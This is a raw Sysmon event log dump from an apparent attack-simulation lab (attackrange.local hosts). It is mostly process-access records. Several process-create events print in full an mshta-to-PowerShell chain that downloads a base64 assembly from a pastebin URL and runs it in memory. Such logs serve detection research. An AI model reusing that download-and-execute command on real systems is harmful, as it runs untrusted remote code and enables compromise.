08:01:01.324{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107136Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.324{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107135Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.324{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107134Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.324{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107133Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.324{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B4BD-615A-4E02-00000000FC01}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107132Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.324{58E9C193-B4BD-615A-4D02-00000000FC01}15043288C:\Windows\system32\mshta.exe{58E9C193-B4BD-615A-4E02-00000000FC01}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\shell32.dll+3ccff|C:\Windows\System32\shell32.dll+3cb8c|C:\Windows\System32\shell32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107131Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.329{58E9C193-B4BD-615A-4E02-00000000FC01}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B4BD-615A-4D02-00000000FC01}1504C:\Windows\System32\mshta.exemshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000107130Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.286{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-4D02-00000000FC01}1504C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107129Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.286{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B4BD-615A-4D02-00000000FC01}1504C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107128Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.286{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B4BD-615A-4D02-00000000FC01}1504C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107127Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.273{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B4BD-615A-4D02-00000000FC01}1504C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107126Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.273{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B4BD-615A-4D02-00000000FC01}1504C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107125Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.255{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-4D02-00000000FC01}1504C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107124Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.255{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-4D02-00000000FC01}1504C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107123Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.239{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107122Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.239{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107121Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.239{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107120Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.239{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107119Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.239{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B4BD-615A-4D02-00000000FC01}1504C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107118Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.239{58E9C193-B4B4-615A-3902-00000000FC01}66807188C:\Windows\System32\cmd.exe{58E9C193-B4BD-615A-4D02-00000000FC01}1504C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107117Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.244{58E9C193-B4BD-615A-4D02-00000000FC01}1504C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEmshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{58E9C193-B4B4-615A-3902-00000000FC01}6680C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000107116Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.139{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083284Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:02.266{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FA697A09552335873118C29FBE16EF5,SHA256=24B85FC3F0A8F570E3AEC4308BF7B1503AD836D6585CEDCBC88209C4DF0B4DB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107233Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.594{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CDF94FDDAB76930792FD6BCAB3EC8768,SHA256=05C7769683C39D170D3D5301DD22B030F9BA2E267ECFD063BFAE224224B96980,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107232Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.462{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E494F82933347F598CB62EE819704147,SHA256=C0779D82F23F1D5246831C16055B419D6354FBDB89025EC3D282ADF9E63AB984,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107231Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.462{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C5AC2DCBB05C9CC47971E06EDE8A4F5,SHA256=5DBE8347F8779B33D3CF99CC37D64482459E41A9095D6DE6EF015E7180281892,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107230Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.331{58E9C193-B4BE-615A-5602-00000000FC01}43442188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107229Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.143{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5202-00000000FC01}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107228Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.143{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5202-00000000FC01}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107227Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.127{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B4BE-615A-5602-00000000FC01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107226Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.127{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5402-00000000FC01}7280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107225Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.127{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5402-00000000FC01}7280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107224Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 